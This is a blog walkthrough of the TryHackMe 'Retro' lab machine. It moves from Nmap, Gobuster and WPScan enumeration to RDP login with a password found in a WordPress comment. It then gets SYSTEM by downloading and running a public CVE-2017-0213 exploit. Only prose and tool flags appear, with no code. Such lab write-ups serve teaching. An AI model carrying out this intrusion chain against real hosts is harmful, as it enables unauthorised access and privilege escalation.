CTF Walkthroughs, TryHackMe

TryHackMe – Retro Walkthrough

July 8, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was a Windows machine that required to enumerate a WordPress instance to identify user credentials and remotely authenticate via RDP and exploit the Windows COM Vulnerability to escalate privileges to SYSTEM.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has revealed two open ports: 80 (HTTP) and 3389 (RDP), that means HTTP is probably the best way forward.

Enumerating HTTP

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

When navigating to the /retro site, it appears to be a WordPress implementation:

When running WPScan against the target machine with the following flags, a “wade” user is found:

  • –url to specify the URL for the Wordrpess application, in this case http://10.10.251.237/retro
  • -e to specify the elements to enumerate, in this case, ap for all plugins, at for all themes, tt for timthumbs, cb for config backups, dbe for database exports, u for users and m for media:
  • –plugins-detection aggressive to enumerate all existing plugins

It appears that Wade has published a post on the WordPress site:

And it seems a comment containing a password was added as well:

As it turns out, the password mentioned in the comment was being used by the “wade” user on the machine. Authenticating remotely via RDP using FreeRDP:

Privilege Escalation

Enumerating system information to find out more information about the operating system, its version/build and any hotfixes installed:

This specific build of Windows 10 is affected by a kernel exploit that allows for privilege escalation (2017-0213), as mentioned in PayloadAllTheThings:

This GitHub repository contains an executable that can be used to exploit this vulnerability:

The “Affected Products” section of the repository also confirms that the build the box is running is vulnerable:

Downloading the archive containing the exploit and decompressing it, then setting up a Python Simple HTTP Server to host it:

Transferring the exploit to the target machine using the Powershell Invoke-WebRequest CMDLet:

The request was received

Executing the exploit on the target machine:

Upon execution, the exploit has spawned a new CMD shell as SYSTEM:

Conclusion

Even though the exploitation part for this box was quite trivial and the privilege escalation was done through a kernel exploit, I still enjoyed it as finding the exploit did require some research and automated enumeration tools would come back with a lot of false positives.